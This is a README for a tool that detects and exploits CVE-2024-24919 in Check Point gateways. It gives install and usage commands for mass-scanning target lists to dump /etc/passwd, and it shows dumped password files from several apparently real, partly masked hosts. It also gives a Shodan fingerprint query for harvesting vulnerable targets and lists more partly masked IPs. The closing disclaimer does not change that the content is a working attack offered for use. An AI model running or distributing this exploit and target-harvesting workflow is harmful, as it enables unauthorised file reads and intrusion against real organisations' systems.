An Vulnerability detection and Exploitation tool for CVE-2024-24919
git clone https://github.com/RevoltSecurities/CVE-2024-24919
pip install -r requirements.txt
python3 exploit.py --helppython3 exploit.py -h
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-24919
options:
-h, --help show this help message and exit
-u URL, --url URL [INF]: Specify a URL or domain for vulnerability detection
-l LIST, --list LIST [INF]: Specify a list of URLs for vulnerability detection
-ftd FILE_TO_DUMP, --file-to-dump FILE_TO_DUMP
[INF]: Specify a file path to dump (default: /etc/passwd)
-t THREADS, --threads THREADS
[INF]: Number of threads for list of URLs
-proxy PROXY, --proxy PROXY
[INF]: Proxy URL to send request via your proxy
-v, --verbose [INF]: Increases verbosity of output in console
-o OUTPUT, --output OUTPUT
[INF]: Filename to save output of vulnerable target]
python3 exploit.py -l targets.txt -t 200 -o output.txt -ftd /etc/passwd
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Vulnerable]: https://185.200.78.XXXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/bash
saytel_adm:x:0:0:Linux User,,,:/:/bin/clish
davidg_adm:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
[Vulnerable]: https://207.232.4XX.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
wansup:x:0:0:Linux User,,,:/:/bin/clish
[Vulnerable]: https://81.218.166.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
ace:x:0:0:Linux User,,,:/:/bin/clish
joker:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
Wanna scrape targets and test then install our Unique tool ShodanX and get realtime data of shodan from you Terminal to scrape targets install the Shodanx and Use the command:
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
_ _ __ __
| | | | \ \ / /
___ | |__ ___ __| | __ _ _ __ \ V /
/ __|| '_ \ / _ \ / _` | / _` || '_ \ > <
\__ \| | | || (_) || (_| || (_| || | | | / . \
|___/|_| |_| \___/ \__,_| \__,_||_| |_|/_/ \_\
Author : D.SanjaiKumar @CyberRevoltSecurities
[Version]:ShodanX current version v1.0.1 (latest)
[INFO]: Results Found for your query and facet: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200 & facet:"ip"
[INFO]: 2.82.75.X
[INFO]: 5.102.XXX.XXX
[INFO]: 5.102.203.XXX
[INFO]: 5.102.210.XX
[INFO]: 5.102.211.23
[INFO]: 5.102.XXXX.127
[INFO]: 5.102.233.XXXThe tool is Developed by D.Sanjai Kumar @RevoltSecurities to detect and exploit the Vulnerability CVE-2024-24919 , The tool is only for education and ethical purpose only and Developers are not responsible for any illegal exploitations.